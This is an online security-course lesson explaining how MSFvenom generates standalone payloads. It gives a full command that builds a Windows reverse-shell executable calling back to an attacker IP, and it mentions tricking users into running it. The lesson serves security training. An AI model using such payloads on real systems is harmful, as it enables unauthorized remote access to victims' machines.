Back to course

Generating Reverse Shells with MSFvenom (Tool)

Cyber Security Mastery: From Zero to Hero

MSFvenom: Standalone Payload Generation

While Metasploit handles payloads automatically during exploitation, sometimes you need to generate a standalone malicious executable (e.g., to trick a user into clicking it, or upload it via a file upload vulnerability).

MSFvenom is the combination of payload generation (msfpayload) and encoding (msfencode).

Key Parameters

  • -p: Specify the payload (e.g., linux/x86/shell_reverse_tcp).
  • LHOST and LPORT: Attacker IP and port.
  • -f: Output format (e.g., exe, elf, raw).
  • -o: Output file name.

Example: Creating a Windows Reverse Shell

bash msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o /root/Documents/shell.exe

Action Item: After generating this payload, you must set up a corresponding listener (using netcat or Metasploit's multi/handler) to catch the connection when the target executes the file.